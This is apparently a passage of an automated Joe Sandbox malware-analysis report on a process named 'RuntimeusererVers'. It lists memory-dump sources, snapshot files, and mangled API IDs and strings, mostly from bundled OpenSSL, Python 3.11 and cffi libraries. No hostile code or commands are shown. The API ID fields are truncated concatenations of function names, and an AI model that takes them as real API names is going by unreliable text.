                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_get_ciphersL_get_client_ciphersL_sk_findL_sk_valueList_
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: P_resp_count$E_freeL_sk_new_nullP_freeP_get1_ext_d2iP_resp_get0P_response_get1_basicR_put_errorT_freed2i_
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_freeL_get_ciphersL_newL_sk_valueList_R_clear_errorR_peek_last_error
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Dict_Item$Bytes_FromObject_SizeStringTrackmemcpy
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_set_flags$O_set_retry_reason$O_clear_flagsO_get_retry_reason
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3610643084-0
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _errno$Value$DeallocErr_LongLong_Occurredmalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1551808740-0
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Y_id
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\t1_lib.c
                                                                                                                                                                                                                                          • API String ID: 239174422-1643863364
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$Err_String
                                                                                                                                                                                                                                          • String ID: ($expected a tuple of ctypes
                                                                                                                                                                                                                                          • API String ID: 629984673-2381509598
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: cannot use <cdata '%s'> in a comparison
                                                                                                                                                                                                                                          • API String ID: 0-3474358591
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: expected new array length or list/tuple/str, not %.200s$negative array length
                                                                                                                                                                                                                                          • API String ID: 0-630084864
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: number too large$short$sign$stru
                                                                                                                                                                                                                                          • API String ID: 0-689979194
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocErr_Long_SignString
                                                                                                                                                                                                                                          • String ID: an integer is required$can't convert negative number to unsigned$integer conversion failed
                                                                                                                                                                                                                                          • API String ID: 2527065810-2728004092
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_ctrlO_freeO_newO_s_fileR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_rsa.c
                                                                                                                                                                                                                                          • API String ID: 2618924202-2723262194
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: List_$Dealloc$AppendErr_ErrorFatalFuncPackStringTuple_strncmp
                                                                                                                                                                                                                                          • String ID: fields
                                                                                                                                                                                                                                          • API String ID: 1806387768-2128995208
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                                                                                          • String ID: number too large$void$volatile
                                                                                                                                                                                                                                          • API String ID: 1475443563-2072166545
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
Similarity
• API ID: memcmp
• String ID: number too large$union$unsigned
APIs
Strings
Memory Dump Source
• Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
Similarity
• API ID: Err_Format$Dealloc
• String ID: constant '%s' is of type '%s', whose size is not known
APIs
Strings
Memory Dump Source
• Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
Similarity
• API ID: D_sizeDigestFinal_exX_copy_exX_freeX_mdX_new
• String ID: ..\s\ssl\ssl_lib.c
APIs
Strings
Memory Dump Source
• Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
Similarity
• API ID: Err_Long$AttrDict_GenericItemLong_Object_OccurredString
• String ID: cannot delete struct field$cdata '%s' has no attribute '%s'$cdata '%s' has no field '%s'$cdata '%s' points to an opaque type: cannot write fields
APIs
Strings
Memory Dump Source
• Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
Similarity
• API ID: Err_$Eval_FormatStringThread$Bytes_ClearFromModule_R_peek_last_errorRestoreSaveSizeState
• String ID: key is too long.$msg is too long.
APIs
Strings
Memory Dump Source
• Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
Similarity
• API ID: Err_String$Arg_Object_ParseSizeTuple_
• String ID: O!O!n:rawaddressof$expected a cdata struct/union/array/pointer object$expected a pointer ctype
APIs
Strings
Memory Dump Source
• Source File: 00000030.00000002.1566347608.00007FF81DC71000.00000020.00000001.01000000.0000004D.sdmp, Offset: 00007FF81DC70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566298623.00007FF81DC70000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566383557.00007FF81DC73000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566435114.00007FF81DC75000.00000004.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566474761.00007FF81DC76000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc70000_RuntimeusererVers.jbxd
Similarity
• API ID: ModuleType_$Arg_$KeywordsPositional
• String ID: SimpleQueue
Similarity
• API ID: Long$FromLong_$Err_FormatUnsigned__stdio_common_vsprintf
• String ID: %lld$%llu (0x%llx)$the C compiler says '%.200s' is equal to %s, but the cdef disagrees
Similarity
• API ID: O_f_bufferO_int_ctrlO_newO_push
• String ID: ..\s\ssl\ssl_lib.c
Similarity
• API ID: E_print_exErr_O_freeO_newO_s_memStringX509_
• String ID: failed to allocate BIO$strict
Similarity
• API ID: ComplexComplex_From$Err_Format
• String ID: complex() not supported on cdata '%s'$read_raw_complex_data$read_raw_complex_data: bad complex size
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_$Err_ExceptionFromModuleObjectSpecTypeType_With
                                                                                                                                                                                                                                          • String ID: Empty$Exception raised by Queue.get(block=0)/get_nowait().$_queue.Empty
                                                                                                                                                                                                                                          • API String ID: 1138974572-1946099957
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Module_State$ClearDict_FormatItemUnicode_
                                                                                                                                                                                                                                          • String ID: Unsupported digestmod %R
                                                                                                                                                                                                                                          • API String ID: 3756705361-2483404930
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_O_ctrlO_freeO_newO_s_memO_set_flagsString
                                                                                                                                                                                                                                          • String ID: failed to allocate BIO
                                                                                                                                                                                                                                          • API String ID: 68942223-3472608418
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_peek_error
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3623038435-0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$free$Delete$ConditionVariableWake$CloseEnterErrorHandleLastLeaveObjectSingleWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3339358538-0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _errno$Value$Err_LongLong_Occurredmalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 262410431-0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_clnt.c
                                                                                                                                                                                                                                          • API String ID: 0-592572767
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_sk_valueR_add_error_data
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_clnt.c$No ciphers enabled for max supported SSL/TLS version
                                                                                                                                                                                                                                          • API String ID: 2496138956-1190228026
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: read_raw_complex_data$read_raw_complex_data: bad complex size$read_raw_unsigned_data$read_raw_unsigned_data: bad integer size
                                                                                                                                                                                                                                          • API String ID: 0-1204700216
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Y_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_srvr.c
                                                                                                                                                                                                                                          • API String ID: 1282063954-348624464
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_sk_valueX509_i2d_
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_lib.c$2
                                                                                                                                                                                                                                          • API String ID: 3754435392-3488551833
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: J_obj2txt$FromMallocMem_SizeStringUnicode_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2822617359-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_ctrlO_freeX_new
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_enc.c
                                                                                                                                                                                                                                          • API String ID: 22238829-1839494539
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_sk_pop_freeL_sk_valueR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_cert.c
                                                                                                                                                                                                                                          • API String ID: 732311666-349359282
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_numL_sk_pop_free$L_sk_new_reserveL_sk_valueR_put_errorX509_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1042751175-1080266419
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyModule_GetState.PYTHON311(?,?,00000000,00007FF81E4E2110), ref: 00007FF81E4E226A
                                                                                                                                                                                                                                          • _Py_hashtable_get.PYTHON311(?,?,00000000,00007FF81E4E2110), ref: 00007FF81E4E227A
                                                                                                                                                                                                                                          • EVP_get_digestbyname.LIBCRYPTO-1_1(?,?,00000000,00007FF81E4E2110), ref: 00007FF81E4E22BA
                                                                                                                                                                                                                                          • EVP_get_digestbyname.LIBCRYPTO-1_1(?,?,00000000,00007FF81E4E2110), ref: 00007FF81E4E22D2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: P_get_digestbyname$Module_Py_hashtable_getState
                                                                                                                                                                                                                                          • String ID: unsupported hash type %s
                                                                                                                                                                                                                                          • API String ID: 3106711627-1604032313
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_push$L_sk_new_nullL_sk_popR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          • API String ID: 1161573302-1080266419
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Module_Py_hashtable_destroyState
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3151084188-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_InitObject_Stringmallocmemcpy
                                                                                                                                                                                                                                          • String ID: return type is a struct/union with a varsize array member$return type is an opaque structure or union
                                                                                                                                                                                                                                          • API String ID: 673089332-262380981
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_Err_Parse_SizeWarnX_clear_optionsX_get_optionsX_set_options
                                                                                                                                                                                                                                          • String ID: ssl.OP_NO_SSL*/ssl.OP_NO_TLS* options are deprecated
                                                                                                                                                                                                                                          • API String ID: 476201610-2795599882
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocObject_$ClearDict_FreeItemRefsTrackWeak
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2303943592-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566347608.00007FF81DC71000.00000020.00000001.01000000.0000004D.sdmp, Offset: 00007FF81DC70000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_List_StringThread_allocate_lock
                                                                                                                                                                                                                                          • String ID: can't allocate lock
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$String$Arg_Number_OccurredParseSizeSsize_tTuple_
                                                                                                                                                                                                                                          • String ID: O!O:new_array_type$negative array length
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$DeallocFormatObject_OccurredUnicode_
                                                                                                                                                                                                                                          • String ID: integer %s does not fit '%s'
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSectionfreemallocmemset$EnterLeave
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: internal error, please report!$st64$uint_fas$uint_lea$unsigned
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
